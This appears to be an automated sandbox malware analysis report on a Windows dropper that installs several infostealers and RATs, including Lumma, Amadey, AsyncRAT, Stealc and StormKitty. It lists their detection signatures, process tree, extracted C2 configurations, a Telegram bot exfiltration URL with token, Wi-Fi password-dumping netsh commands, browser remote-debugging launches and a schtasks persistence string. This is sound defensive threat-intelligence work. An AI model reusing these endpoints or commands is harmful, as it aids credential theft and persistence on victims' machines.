Edit tour

Windows Analysis Report
i8Vwc7iOaG.exe

Overview

General Information

Sample name:	i8Vwc7iOaG.exe renamed because original name is a hash value
Original sample name:	646b8b4f1120776d924259da33f0e73d.exe
Analysis ID:	1580865
MD5:	646b8b4f1120776d924259da33f0e73d
SHA1:	db1fc3f2de367def833b34dfc6228ea3e185815d
SHA256:	bcaff60055929f46412dd46cfe9f59413be788904cb1d55f794ecb5ef0409cba
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected AsyncRAT

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected Vidar stealer

Yara detected WorldWind Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Modifies the context of a thread in another process (thread injection)

Monitors registry run keys for changes

PE file contains section with special chars

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious desktop.ini Action

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

i8Vwc7iOaG.exe (PID: 3640 cmdline: "C:\Users\user\Desktop\i8Vwc7iOaG.exe" MD5: 646B8B4F1120776D924259DA33F0E73D)

Y71AV1VIPLT8Y663WBDXSB.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe" MD5: 97B80E7A522A3D40515E954A1FB4B428)

chrome.exe (PID: 3580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2228,i,8136523898456427104,7665852978689439012,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8088 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,1031345555997666430,10718117645205196851,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 7788 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\FIJECAEHJJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FIJECAEHJJ.exe (PID: 3196 cmdline: "C:\Users\user\Documents\FIJECAEHJJ.exe" MD5: D297F9F22080C6F66B4E9C9156A6FF86)

4XVI62Q28CHMU2Y2V4F8.exe (PID: 2200 cmdline: "C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe" MD5: D297F9F22080C6F66B4E9C9156A6FF86)

skotes.exe (PID: 5024 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: D297F9F22080C6F66B4E9C9156A6FF86)

skotes.exe (PID: 6048 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: D297F9F22080C6F66B4E9C9156A6FF86)

skotes.exe (PID: 7608 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: D297F9F22080C6F66B4E9C9156A6FF86)

52ba7a538c.exe (PID: 6324 cmdline: "C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe" MD5: 6D6BBF1E873FB791141EA7FE2C166DCF)

BitLockerToGo.exe (PID: 3176 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

chrome.exe (PID: 2140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2600 --field-trial-handle=2568,i,14958645469672298584,2939773364007336378,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2172,i,12041411558634704463,13499998524665998635,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

5fe60d6c80.exe (PID: 2232 cmdline: "C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe" MD5: 3FA3842503DB7F65438CDDE8B7A7DD0F)

axplong.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 3FA3842503DB7F65438CDDE8B7A7DD0F)

ukX1YE2.exe (PID: 3944 cmdline: "C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe" MD5: 71B104246AC3F43D058E7C67E8B07DEF)

soonmaintain.exe (PID: 1488 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe MD5: 92A9F111C456947F39B59EB9F13E4BF6)

InstallUtil.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" MD5: 909A1D386235DD5F6BA61B91BA34119D)

k0ukcEH.exe (PID: 2516 cmdline: "C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe" MD5: 4EAE4944D789D3440760E32531707AD7)

t0IHakP.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe" MD5: FAFFBA70209547222069C4E849867640)

cmd.exe (PID: 5364 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6608 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 6220 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 2672 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6760 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1560 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 1352 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

UfEglUg.exe (PID: 1256 cmdline: "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe" MD5: 1C21807FE5D68CDBE4B25DB1F98D0178)

conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

UfEglUg.exe (PID: 4752 cmdline: "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe" MD5: 1C21807FE5D68CDBE4B25DB1F98D0178)

a9afbb531e.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe" MD5: 87330F1877C33A5A6203C49075223B16)

dea82620d5.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)

conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dea82620d5.exe (PID: 5344 cmdline: "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)

msedge.exe (PID: 5824 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1308 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2156,i,5924171307802308355,13016151370304266811,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

axplong.exe (PID: 7284 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 3FA3842503DB7F65438CDDE8B7A7DD0F)

rundll32.exe (PID: 5952 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

msedge.exe (PID: 6268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2092,i,2243381234690523858,16077404214973868286,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

axplong.exe (PID: 4212 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 3FA3842503DB7F65438CDDE8B7A7DD0F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz", "undesirabkel.click", "rebuildeso.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "cashfuzysao.buzz"], "Build id": "LPnhqo--ijcujmprgili"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendMessage"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\1004899001\am209.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
